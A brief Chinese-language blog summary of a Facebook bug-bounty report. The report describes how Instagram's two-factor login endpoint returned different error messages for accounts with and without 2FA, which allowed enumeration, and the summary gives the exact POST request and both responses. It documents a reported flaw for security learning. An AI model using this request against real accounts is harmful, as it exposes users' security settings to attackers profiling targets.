Enumerate IG account who has 2FA protection

How I was able to enumerate Instagram Accounts who had enabled 2FA for additional protection一文介绍了IG 在业务逻辑上设计的缺陷,令到黑客可以枚举所有 IG 用户, 得知其是否打开了2FA.

Affected URL:

POST /accounts/login/ajax/two_factor/ HTTP/1.1
Host: www.instagram.com
[REDACTED]

username=[our-username]&verificationCode=xxxxxx&identifier=Iid0Z1fbMc

替换 username, 乱输入 OTP.

假如有2FA, Resp:

HTTP/1.1 400 Bad Request

{"message": "Please check the security code we sent you and try again.", "status": "fail"}

假如无 2FA, Resp:

HTTP/1.1 400 Bad Request

{"message": "Sorry, there was a problem with your request.", "status": "fail"}

Ref

[Facebook Bug Bounty] How I was able to enumerate Instagram Accounts who had enabled 2FA (Two Step…

Show Comments